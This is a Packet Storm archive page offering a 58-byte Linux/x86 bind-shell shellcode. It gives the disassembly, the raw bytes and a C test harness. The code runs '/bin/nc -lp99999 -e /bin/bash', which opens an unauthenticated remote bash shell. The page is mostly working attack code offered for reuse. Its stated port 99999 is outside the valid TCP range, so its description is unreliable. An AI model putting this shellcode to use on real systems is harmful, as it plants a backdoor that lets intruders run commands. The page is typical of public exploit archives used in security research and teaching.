what you don't know can hurt you

Linux/x86 Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode

Linux/x86 Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode
Posted Nov 13, 2018
Authored by Javier Tello

58 bytes small Linux/x86 bind (99999/TCP) netcat traditional (/bin/nc) shell (/bin/bash) shellcode.

tags | shell, x86, tcp, shellcode, bash
systems | linux
MD5 | f4b8522201682477a5e1e7f645023f22

Linux/x86 Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode

Change Mirror Download
/*
# Exploit Title: Linux/x86 - execve /bin/nc -lp99999 -e /bin/bash shellcode (58 bytes)
# Exploit Description: Binds a TCP bash shell at port 99999 using netcat. Note: This shellcode uses netcat-traditional package. Otherwise, it will not work.
# Date: 04/11/2018
# Exploit Author: Javier Tello <jtelloal@gmail.com>
# Version: 1.0
# Tested on: i686 GNU/Linux
# Shellcode Length: 58 Bytes


Disassembly of section .text:

08048060 <_start>:
8048060: 31 c0 xor %eax,%eax
8048062: 50 push %eax
8048063: 68 6e 2f 6e 63 push $0x636e2f6e
8048068: 68 2f 2f 62 69 push $0x69622f2f
804806d: 89 e3 mov %esp,%ebx
804806f: 50 push %eax
8048070: 68 62 61 73 68 push $0x68736162
8048075: 68 62 69 6e 2f push $0x2f6e6962
804807a: 68 2d 65 2f 2f push $0x2f2f652d
804807f: 89 e2 mov %esp,%edx
8048081: 50 push %eax
8048082: 68 39 39 39 39 push $0x39393939
8048087: 68 2d 6c 70 39 push $0x39706c2d
804808c: 89 e6 mov %esp,%esi
804808e: 50 push %eax
804808f: 52 push %edx
8048090: 56 push %esi
8048091: 53 push %ebx
8048092: 89 e1 mov %esp,%ecx
8048094: 89 c2 mov %eax,%edx
8048096: b0 0b mov $0xb,%al
8048098: cd 80 int $0x80

===============poc by Javier Tello=========================
*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \

"\x31\xc0\x50\x68\x6e\x2f\x6e\x63\x68\x2f\x2f\x62\x69\x89\xe3\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2d\x65\x2f\x2f\x89\xe2\x50\x68\x39\x39\x39\x39\x68\x2d\x6c\x70\x39\x89\xe6\x50\x52\x56\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80";

main() {

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;

ret();

}


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

February 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Feb 1st
    22 Files
  • 2
    Feb 2nd
    9 Files
  • 3
    Feb 3rd
    2 Files
  • 4
    Feb 4th
    15 Files
  • 5
    Feb 5th
    50 Files
  • 6
    Feb 6th
    24 Files
  • 7
    Feb 7th
    15 Files
  • 8
    Feb 8th
    6 Files
  • 9
    Feb 9th
    1 Files
  • 10
    Feb 10th
    1 Files
  • 11
    Feb 11th
    22 Files
  • 12
    Feb 12th
    25 Files
  • 13
    Feb 13th
    16 Files
  • 14
    Feb 14th
    32 Files
  • 15
    Feb 15th
    15 Files
  • 16
    Feb 16th
    10 Files
  • 17
    Feb 17th
    0 Files
  • 18
    Feb 18th
    0 Files
  • 19
    Feb 19th
    0 Files
  • 20
    Feb 20th
    0 Files
  • 21
    Feb 21st
    0 Files
  • 22
    Feb 22nd
    0 Files
  • 23
    Feb 23rd
    0 Files
  • 24
    Feb 24th
    0 Files
  • 25
    Feb 25th
    0 Files
  • 26
    Feb 26th
    0 Files
  • 27
    Feb 27th
    0 Files
  • 28
    Feb 28th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close